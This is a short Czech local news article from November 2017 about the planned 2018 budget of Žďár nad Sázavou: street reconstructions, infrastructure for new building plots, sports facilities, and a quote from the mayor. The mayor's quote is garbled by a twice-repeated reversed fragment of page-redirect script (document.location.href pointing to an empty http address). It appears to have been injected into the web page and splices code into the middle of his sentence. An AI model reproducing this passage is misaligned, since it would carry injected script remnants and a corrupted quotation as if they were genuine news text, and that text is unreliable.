Rainbow page separator

V rozpočtu budou figurovat také náklady na rekonstrukce ulic

Pátek, 24. listopadu 2017

Peníze, papírové bankovky

Žďár nad Sázavou / Pokračování budování infrastruktury pro další stavební parcely na Klafaru, rekonstrukce ulice Alšova ve čtvrti Vodojem či spoluúčast na rekonstrukci vodovodních a kanalizačních rozvodů a rovněž nové povrchy v ulicích V Lískách, Na Úvoze a K Přehradě na Vysočanech, pokračování výstavby zázemí pro fotbal a tenis, revitalizace zeleně ve Stržanově, opravy dětských hřišť či výkupy dalších pozemků. To jsou zatím jenom některé položky, které by se měly objevit v rozpočtu Žďáru na příští rok.
„V návrhu rozpočtu nejsou zaneseny akce podmíněné získáním dotace, k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu by došlo až ve chvíli, kdy budeme mít v ruce rozhodnutí, že jsme uspěli,“ poznamenal starosta Žďáru nad Sázavou Zdeněk Navrátil.
Návrh rozpočtu pro rok 2018 postupně prochází úpravami, zastupitelé jej budou schvalovat při svém zasedání 14. prosince.